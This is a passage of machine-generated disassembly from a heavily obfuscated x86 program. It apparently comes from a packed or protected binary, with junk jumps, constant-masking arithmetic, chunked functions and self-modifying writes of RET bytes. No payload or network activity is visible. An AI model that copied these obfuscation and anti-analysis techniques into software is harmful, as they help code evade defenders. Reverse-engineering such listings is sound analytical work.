		db 0A7h, 0FEh, 0FFh
; ---------------------------------------------------------------------------

loc_454F2F:				; CODE XREF: y2kk37jd:0044C34Ej
		add	edi, 2C520155h
		mov	[edi], eax
		pop	edi
		lea	eax, nullsub_374
		call	sub_44E39C
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_454F43:				; CODE XREF: sub_44113A+7AA5j
		jmp	nullsub_159
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------

loc_454F48:				; CODE XREF: y2kk37jd:004458B8j
		jmp	nullsub_494
; ---------------------------------------------------------------------------

loc_454F4D:				; CODE XREF: y2kk37jd:0045BCF3j
		sub	edi, 103CE226h
		and	edi, 2041F01Fh
		jnz	loc_442C93

loc_454F5F:				; CODE XREF: y2kk37jd:0043C7E1j
		jmp	sub_4526B7
; ---------------------------------------------------------------------------
		push	ebp
		jge	loc_456E78
		sub	ecx, ebx
		jmp	loc_446E76
; ---------------------------------------------------------------------------

loc_454F72:				; DATA XREF: y2kk37jd:loc_43C0D4o
		mov	eax, [ebp-108h]
		mov	edx, [ebp-104h]
		mov	dl, [edx]
		mov	[ebp+eax-100h],	dl
		inc	dword ptr [ebp-108h]
		jmp	loc_44C19E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_454F92:				; CODE XREF: sub_445226-3B26j
		cmp	ebp, eax
		jmp	loc_456340
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449734

loc_454F99:				; CODE XREF: sub_449734+13j
		jb	loc_45BDEC

loc_454F9F:				; CODE XREF: sub_443D4D+18952j
		jmp	loc_43DAFC
; END OF FUNCTION CHUNK	FOR sub_449734
; ---------------------------------------------------------------------------

loc_454FA4:				; CODE XREF: y2kk37jd:0044E8BBj
		jmp	loc_44613F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A12

loc_454FA9:				; CODE XREF: sub_448A12+2j
		jmp	loc_446A12
; END OF FUNCTION CHUNK	FOR sub_448A12
; ---------------------------------------------------------------------------
		mov	edi, 9A080E43h
		jmp	loc_4406E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_454FB8:				; CODE XREF: sub_448700:loc_44823Aj
		jz	loc_44CD32
		jmp	loc_445B98
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444DF4

loc_454FC3:				; CODE XREF: sub_444DF4:loc_45C66Fj
		movzx	eax, byte ptr [eax]
		call	sub_4436C1
; END OF FUNCTION CHUNK	FOR sub_444DF4
; START	OF FUNCTION CHUNK FOR sub_447832

loc_454FCB:				; CODE XREF: sub_447832+14259j
		jmp	nullsub_396
; END OF FUNCTION CHUNK	FOR sub_447832
; ---------------------------------------------------------------------------

loc_454FD0:				; CODE XREF: y2kk37jd:00440642j
		jmp	loc_442F7E
; ---------------------------------------------------------------------------

loc_454FD5:				; DATA XREF: sub_444BB7+F531o
		mov	edx, [esp]
		push	eax
		mov	eax, edx
		call	sub_44C500
		mov	eax, [esp]
		jmp	loc_440611
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_454FE8:				; CODE XREF: sub_45B7AA:loc_449C35j
		jl	loc_43CD7C
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; START	OF FUNCTION CHUNK FOR sub_452A89

loc_454FEE:				; CODE XREF: sub_452A89+14j
		jmp	loc_45C407
; END OF FUNCTION CHUNK	FOR sub_452A89
; ---------------------------------------------------------------------------
		not	edi
		shl	edi, 11h
		test	eax, 0CEB8A57Bh
		jmp	loc_43CD76
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_455003:				; CODE XREF: sub_43E679+832Bj
		add	eax, edi
		pop	edi
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_441710
		jmp	loc_447181
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------

loc_455016:				; CODE XREF: y2kk37jd:004442EAj
		sub	edi, 31DC22EEh
		add	edi, 0A409B88h
		push	offset sub_458F38
		jmp	loc_4532EA
; ---------------------------------------------------------------------------

loc_45502C:				; CODE XREF: y2kk37jd:004511BBj
		sub	edi, edx

loc_45502E:				; CODE XREF: y2kk37jd:loc_4511A6j
		sub	esi, 67F71061h
		xor	esi, 22AA4691h
		xchg	esi, [esp]
		jmp	loc_45676B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_455042:				; CODE XREF: sub_4577FE:loc_453B01j
		push	0AF7573A2h
		pop	eax
		xor	eax, 0F2FD08CCh
		add	eax, 0A2BB529Ch
		jmp	loc_43C56D
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_455059:				; CODE XREF: sub_445787:loc_43E55Ej
		mov	edx, eax
		xchg	edx, [esp-8+arg_4]
		call	sub_44DB32

loc_455063:				; CODE XREF: sub_440D56+8j
		push	offset loc_43B872
		jmp	loc_450A5E
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------

loc_45506D:				; CODE XREF: y2kk37jd:00444A87j
		xor	eax, 45297197h
		add	eax, 0CB45D0Ah

loc_455079:				; CODE XREF: y2kk37jd:00455A68j
		test	eax, 8000h
		jmp	loc_43F1F2
; ---------------------------------------------------------------------------

loc_455084:				; DATA XREF: y2kk37jd:0045A69Co
		jl	loc_451C71
		inc	eax
		mov	[ebp-1Ch], eax
		mov	dword ptr [ebp-18h], 0
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_455095:				; CODE XREF: sub_44CEAB-B660j
		mov	eax, [ebp-4]
		mov	edx, [ebp-14h]
		add	eax, [edx+20h]
		xor	edx, edx
		jmp	loc_456DE1
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; ---------------------------------------------------------------------------

locret_4550A5:				; CODE XREF: y2kk37jd:0043C6D1j
		retn
; ---------------------------------------------------------------------------

loc_4550A6:				; CODE XREF: y2kk37jd:00452562j
		jmp	loc_4432E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_4550AB:				; CODE XREF: sub_454D0F:loc_44035Ej
		push	esi
		mov	esi, eax
		xchg	esi, [esp+4+var_4]
		mov	eax, edx

loc_4550B3:				; CODE XREF: y2kk37jd:loc_451480j
		jmp	loc_44DCB6
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D8CE

loc_4550B8:				; CODE XREF: sub_44D8CE:loc_43B3F6j
		rol	esi, 0Ah
		cmp	esi, 6B7F41EBh
		jmp	loc_44E853
; END OF FUNCTION CHUNK	FOR sub_44D8CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C335

loc_4550C6:				; CODE XREF: sub_43C335+CB01j
		ror	eax, 8
		mov	ds:dword_447324, eax
		jmp	nullsub_237
; END OF FUNCTION CHUNK	FOR sub_43C335

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4550D4	proc near		; CODE XREF: sub_45C2E1j
		push	ebp
		mov	ebp, esp
		push	offset sub_4435B9

loc_4550DC:				; CODE XREF: y2kk37jd:00440138j
		jmp	nullsub_490
sub_4550D4	endp

; ---------------------------------------------------------------------------

loc_4550E1:				; CODE XREF: y2kk37jd:loc_44088Cj
		add	eax, 0EB1FF350h
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		push	offset sub_450394
		jmp	locret_45A560
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B55D

loc_4550F7:				; CODE XREF: sub_44B55D-49F4j
		shr	ecx, 0Ch

loc_4550FA:				; CODE XREF: sub_44B55D:loc_45A3D2j
		push	2EA56134h
		pop	eax
		and	eax, 2AF627BAh
		add	eax, 524C22BDh
		add	eax, ebp
		jmp	loc_452FD6
; END OF FUNCTION CHUNK	FOR sub_44B55D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441856

loc_455113:				; CODE XREF: sub_441856:loc_45824Aj
					; DATA XREF: y2kk37jd:00454C5Do
		imul	byte ptr [edx]
; END OF FUNCTION CHUNK	FOR sub_441856
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_455115:				; CODE XREF: sub_43F346:loc_43F37Bj
		cmp	al, 0A4h
		jz	loc_4455D8
		jmp	loc_45942F
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------

loc_455122:				; CODE XREF: y2kk37jd:loc_455E23j
					; y2kk37jd:00455E33j
		sub	ecx, 91A5FFD4h
		test	ecx, 4
		jmp	loc_43B013
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_455133:				; CODE XREF: sub_44B814:loc_44087Dj
		and	ecx, 0D0CE8139h
		xor	ecx, 508882C8h
		xor	edx, edx
		div	ecx
		push	esi
		jmp	loc_451D97
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------

loc_455149:				; CODE XREF: y2kk37jd:0044F744j
		pushf
		push	82747BE4h
		pop	eax
		sub	eax, 0DB470F39h
		or	eax, 0DD3B961Bh
		and	eax, 446ADFE9h
		jmp	loc_44706E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B38

loc_455167:				; CODE XREF: sub_445B38:loc_457F02j
		jz	loc_4565B3
		jmp	loc_4500B5
; END OF FUNCTION CHUNK	FOR sub_445B38
; ---------------------------------------------------------------------------

loc_455172:				; CODE XREF: y2kk37jd:loc_456E0Dj
		jge	loc_43BE28
; START	OF FUNCTION CHUNK FOR sub_45A05D

loc_455178:				; CODE XREF: sub_45A05D+6j
		jmp	loc_44F41A
; END OF FUNCTION CHUNK	FOR sub_45A05D
; ---------------------------------------------------------------------------
		sub	ecx, 9BB7E91Ah
		cmp	edx, ebx
		jmp	loc_455D87
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_45518A:				; CODE XREF: sub_43F346+DAE7j
		pop	edx
		sbb	ebp, esi
		jmp	loc_444A8C
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A3E7

loc_455192:				; CODE XREF: sub_44A3E7:loc_45C272j
		pop	eax
		mov	eax, [esp+0]
		push	edx
		call	sub_43D1BD

loc_45519C:				; CODE XREF: sub_43ED19+177CDj
		jmp	loc_43FC77
; END OF FUNCTION CHUNK	FOR sub_44A3E7
; ---------------------------------------------------------------------------

loc_4551A1:				; CODE XREF: y2kk37jd:0044CA2Bj
					; y2kk37jd:loc_45557Aj
		push	ecx
		mov	ecx, edi
		xchg	ecx, [esp]
		push	0C4393944h
		pop	edi
		sub	edi, ds:4000ECh
		rol	edi, 1
		add	edi, 4A2C43DDh
		jmp	loc_44A9E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4551C0:				; CODE XREF: sub_45B7AA+B0j
		jz	loc_447453
		sbb	ecx, ebp
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_4551C8:				; CODE XREF: sub_448CAE:loc_45080Ej
		add	esi, 71557431h
		call	sub_43C1D5

loc_4551D3:				; CODE XREF: y2kk37jd:loc_457BE9j
		cdq
		or	esi, eax
		jmp	loc_447E21
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------

loc_4551DB:				; CODE XREF: y2kk37jd:loc_44D199j
		pop	ebx
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_4551DC:				; CODE XREF: sub_43F346:loc_446A58j
		xor	ebx, 5B42F7EEh
		add	ebx, 0ED5E6EADh
		popf
		xchg	ebx, [esp+0]
		jmp	loc_455B29
; END OF FUNCTION CHUNK	FOR sub_43F346

; =============== S U B	R O U T	I N E =======================================



sub_4551F1	proc near		; CODE XREF: y2kk37jd:004433AEj
					; sub_448CAE+972Dp

; FUNCTION CHUNK AT 0045BB40 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, 0A2188C24h
		add	eax, ebp
		push	offset loc_44940A
		jmp	loc_45BB40
sub_4551F1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_455207:				; CODE XREF: sub_43F2F2:loc_443976j
		call	sub_440CD1
		push	edx
		mov	edx, eax
		xchg	edx, [esp+0]

loc_455212:				; CODE XREF: y2kk37jd:00443273j
		ror	eax, 10h
		jmp	loc_451A5E
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_45521A:				; CODE XREF: sub_44113A:loc_43B39Fj
		pop	eax
		or	eax, 951F6030h
		xor	eax, 0BA5FF8h
		or	eax, 363EF8h
		test	eax, 20000000h

loc_455233:				; CODE XREF: sub_43CB02:loc_45ACA6j
		jmp	loc_44DDDA
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_455238:				; CODE XREF: sub_442DDC+45D5j
		add	eax, edi
		pop	edi
		xor	eax, 4DCF7224h
		mov	edx, [esp-8+arg_4]
		push	ebp
		mov	ebp, eax
		jmp	loc_44F272
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452884

loc_45524C:				; CODE XREF: sub_452884-A807j
		test	eax, 2
		jmp	loc_44089C
; END OF FUNCTION CHUNK	FOR sub_452884
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_443. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452441

loc_455258:				; CODE XREF: sub_452441+2ABj
		jmp	nullsub_224
; END OF FUNCTION CHUNK	FOR sub_452441
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_45525D:				; CODE XREF: sub_4507BF-952Fj
		jmp	loc_4591EF
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_455262:				; CODE XREF: sub_4458DD:loc_445651j
		rol	eax, 0Ah
		jnb	loc_44E6BD

loc_45526B:				; CODE XREF: sub_43C46D+F32Bj
		jmp	sub_44DB32
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		add	edx, ebx
		jmp	loc_44E6BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4587AA

loc_455277:				; CODE XREF: sub_4587AA:loc_4587AFj
		add	eax, 8ABE6238h
		sbb	ecx, 60F0E424h
		sbb	edi, esi
		jmp	loc_45BCC9
; END OF FUNCTION CHUNK	FOR sub_4587AA
; ---------------------------------------------------------------------------

loc_45528A:				; CODE XREF: y2kk37jd:loc_43DD75j
		push	offset sub_452935
		jmp	locret_454B50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_455294:				; CODE XREF: sub_457A46-1CC4j
		push	523A200h
; END OF FUNCTION CHUNK	FOR sub_457A46

; =============== S U B	R O U T	I N E =======================================



sub_455299	proc near		; CODE XREF: sub_443AA7-606Ep

; FUNCTION CHUNK AT 0044829B SIZE 0000000A BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [eax]

loc_45529F:				; CODE XREF: y2kk37jd:0045B2AEj
		push	edx
		call	sub_44AC89

loc_4552A5:				; CODE XREF: y2kk37jd:00448060j
		jmp	loc_44829B
sub_455299	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468BE

loc_4552AA:				; CODE XREF: sub_4468BE+Dj
		jmp	nullsub_508
; END OF FUNCTION CHUNK	FOR sub_4468BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443525

loc_4552AF:				; CODE XREF: sub_443525:loc_43B7EEj
		jmp	loc_44E162
; END OF FUNCTION CHUNK	FOR sub_443525
; ---------------------------------------------------------------------------
		rol	eax, 1Ch
		sub	eax, 619760EFh
		xor	eax, 0A742C85Eh
		rol	eax, 1Fh
		jmp	loc_455760
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457FDC

loc_4552CB:				; CODE XREF: sub_457FDCj
		mov	eax, ds:dword_457510
		jmp	loc_445C9D
; END OF FUNCTION CHUNK	FOR sub_457FDC
; ---------------------------------------------------------------------------
word_4552D6	dw 0C084h		; DATA XREF: sub_44E5E5+5D82o
		dd 8D92840Fh, 0AAE9FFFEh
		db 0B0h, 0FEh, 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_4552E3:				; CODE XREF: sub_4448E2-7CC0j
					; sub_4448E2:loc_447965j ...
		jmp	loc_455D8D
; ---------------------------------------------------------------------------

loc_4552E8:				; CODE XREF: sub_4490B4-9723j
					; sub_4448E2-4952j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_4490B4

; =============== S U B	R O U T	I N E =======================================



sub_4552EB	proc near		; CODE XREF: sub_407E67+Ep
					; sub_41A0E3+168p ...

; FUNCTION CHUNK AT 0043CDEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442281 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449251 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044C6E9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452808 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00452C73 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F2F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004531EC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455541 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E8B SIZE 00000023 BYTES

		jo	loc_44C6E9
		push	0F85CAA6Dh
		pop	eax
		jmp	loc_455541
sub_4552EB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4552FC:				; CODE XREF: y2kk37jd:0045AFFAj
		jnp	loc_4546FC

; =============== S U B	R O U T	I N E =======================================



sub_455302	proc near		; CODE XREF: sub_450203:loc_454A6Ep

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CA51 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [esp-4+arg_0]
		push	edx
		push	offset loc_453530
		jmp	loc_43CA51
sub_455302	endp

; ---------------------------------------------------------------------------

loc_455314:				; CODE XREF: y2kk37jd:004564CAj
		jnp	loc_44E9ED
		sbb	ebp, edi
		jmp	loc_43B2CE
; ---------------------------------------------------------------------------
		test	eax, eax
		jz	loc_448B33
		jmp	loc_451CA3
; ---------------------------------------------------------------------------

loc_45532E:				; CODE XREF: y2kk37jd:00451C05j
		js	loc_440A1A
		shr	edx, 1

loc_455336:				; CODE XREF: y2kk37jd:loc_451BF4j
		xor	edx, 1372B7Dh
		push	offset sub_448865
		jmp	locret_44739C
; ---------------------------------------------------------------------------

loc_455346:				; DATA XREF: sub_44610D:loc_442292o
		push	edx
		pop	ebx
		xchg	ebx, [esp]
		call	sub_43F5BD
		mov	eax, 0D59435E2h
		push	esi
		jmp	loc_45553B
; ---------------------------------------------------------------------------

loc_45535B:				; DATA XREF: y2kk37jd:00454759o
		push	edi
		push	0E3317286h
		pop	edi
		rol	edi, 0Fh
		add	edi, 47009350h
		xchg	edi, [esp]
		jmp	loc_443059
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_455373:				; CODE XREF: sub_445226:loc_446397j
		jnz	loc_452D1D
		jmp	loc_441FED
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_45537E:				; CODE XREF: sub_4448E2+1617Dj
		jnz	loc_4511CF
		jmp	loc_4505C5
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_455389:				; CODE XREF: sub_44B814-887Dj
		popf

loc_45538A:				; CODE XREF: sub_44B814:loc_44D38Fj
		call	sub_447E2D
		test	al, al
		jz	loc_4447B5
		jmp	loc_44F838
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454433

loc_45539C:				; CODE XREF: sub_454433+13j
		add	edi, 3D362Ah
		xchg	edi, [esp+0]
		jmp	loc_458655
; END OF FUNCTION CHUNK	FOR sub_454433
; ---------------------------------------------------------------------------

loc_4553AA:				; CODE XREF: y2kk37jd:0044BD43j
		cdq
		ror	edi, 19h
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_4553AE:				; CODE XREF: sub_44594E:loc_44BD33j
		add	edi, 53A8CD2Fh
		test	edi, 1
		jmp	loc_43CD21
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446052

loc_4553BF:				; CODE XREF: sub_446052:loc_44E60Dj
		pop	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_446052

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4553C1	proc near		; CODE XREF: sub_443AFD-2664p
					; y2kk37jd:00442D9Cp ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E351 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441961 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442CBA SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044601A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447FA8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449DDF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E808 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E979 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F6A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004530FE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004535C9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00453760 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00453D27 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E87 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459393 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A385 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045A8A8 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	esi
		xor	esi, eax
		jmp	loc_441961
sub_4553C1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_4553CC:				; CODE XREF: sub_4507BF-120E9j
					; y2kk37jd:004541C6j
		add	edx, 0A3A1DC97h
		call	sub_440CD1
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		jmp	loc_440DE9
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EFD5

loc_4553E2:				; CODE XREF: sub_44EFD5+4j
					; sub_449C4F:loc_451D00j
		push	offset sub_45C6ED
		jmp	nullsub_164
; END OF FUNCTION CHUNK	FOR sub_44EFD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C0A

loc_4553EC:				; CODE XREF: sub_442C0A+87B2j
		mov	esi, edi
		pop	edi
		rol	esi, 1Ch
		or	esi, 0B8F620A6h
		add	esi, 1AB0285Eh

loc_4553FE:				; CODE XREF: sub_445226:loc_44F6BFj
		sub	eax, esi
		pop	esi
		jmp	loc_442245
; END OF FUNCTION CHUNK	FOR sub_442C0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_455406:				; CODE XREF: sub_453583:loc_44175Fj
		pop	edx
		mov	al, [ecx]
		pop	ecx
		mov	esp, ebp

loc_45540C:				; CODE XREF: y2kk37jd:loc_45B0B5j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA5B

loc_45540E:				; CODE XREF: sub_43CA5B+287Fj
		jmp	loc_446D06
; END OF FUNCTION CHUNK	FOR sub_43CA5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_455413:				; CODE XREF: y2kk37jd:004423C3j
					; sub_454E20+8j
		mov	byte ptr [ebp-5], 0
		jmp	loc_4488B8
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------
		push	eax
		push	offset sub_44E662
		jmp	locret_457F82
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_455427:				; CODE XREF: sub_4429DD+BBECj
		and	ebx, 0D267EA72h
		or	ebx, 18C59762h
		xor	ebx, 4D27665Bh
		add	ebx, 6863F410h
		jmp	loc_4489CE
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------

loc_455444:				; CODE XREF: y2kk37jd:0045088Cj
		cmp	ebp, 828D895Fh
		jmp	loc_4503E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442717

loc_45544F:				; CODE XREF: sub_444825+9j
					; sub_442717:loc_44623Dj
		mov	esp, ebp
		xchg	edx, [esp-4+arg_0]
		mov	ebp, edx
		pop	edx
		retn
; END OF FUNCTION CHUNK	FOR sub_442717
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_455458:				; CODE XREF: sub_44DED9+Bj
		call	nullsub_4
		call	sub_4577FE
		test	al, al
		jmp	loc_44EBAE
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_455469:				; CODE XREF: sub_445226+CFj
		mov	eax, [ebp-4]
		push	offset loc_457915
		jmp	nullsub_165
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_455476:				; CODE XREF: y2kk37jd:00459EEBj
		sbb	esi, 0B89D9EB5h

; =============== S U B	R O U T	I N E =======================================



sub_45547C	proc near		; CODE XREF: sub_43C7B9+1DC14p
		xchg	edx, [esp+0]
		pop	edx
		push	eax
		retn
sub_45547C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_455482:				; CODE XREF: sub_4448E2-7975j
		jmp	loc_440143
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_455488:				; CODE XREF: y2kk37jd:loc_43F2ECj
					; sub_44AC89-B708j
		jmp	loc_444625
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
		db 0A7h, 0ADh, 2Dh
dword_455490	dd 0F9100E0Ah		; DATA XREF: sub_43ED86+6r
					; sub_43ED86:loc_442A65r ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_455494:				; CODE XREF: sub_4477A2+FF80j
		jmp	loc_448E63
; END OF FUNCTION CHUNK	FOR sub_4477A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44201B

loc_455499:				; CODE XREF: sub_44201B+14j
		jmp	loc_45BC4E
; END OF FUNCTION CHUNK	FOR sub_44201B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_45549E:				; CODE XREF: sub_442ED1-2F60j
					; sub_446718:loc_454105j
		jmp	loc_44199A
; END OF FUNCTION CHUNK	FOR sub_446718

; =============== S U B	R O U T	I N E =======================================



sub_4554A3	proc near		; CODE XREF: .text:loc_40460Fp
					; DATA XREF: jlrllt49:off_41E1A4o

; FUNCTION CHUNK AT 0043C576 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043E197 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043E42B SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00442C1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446201 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045BFA5 SIZE 00000005 BYTES

		jz	loc_442C1C
		push	2F814B32h
		pop	eax
		jmp	loc_43E42B
sub_4554A3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4554B4:				; DATA XREF: sub_443ECB:loc_45A881o
		push	678DEDBEh
		pop	eax
		sub	eax, 0E3AA0789h
		xor	eax, 9C4F9246h
		add	eax, ebp
; START	OF FUNCTION CHUNK FOR sub_451964

loc_4554C8:				; CODE XREF: sub_451964-3145j
		add	eax, 0E0538B89h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_442871
; END OF FUNCTION CHUNK	FOR sub_451964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_4554D8:				; CODE XREF: sub_45689F+540Fj
		mov	[ebx], eax
		pop	ebx
		lea	eax, sub_454539
		mov	byte ptr [eax],	0C3h
		jmp	loc_458BAE
; END OF FUNCTION CHUNK	FOR sub_45689F

; =============== S U B	R O U T	I N E =======================================



sub_4554E9	proc near		; CODE XREF: y2kk37jd:0043B91Fj
					; sub_43C851:loc_4560E2p

; FUNCTION CHUNK AT 0043E0B0 SIZE 00000007 BYTES
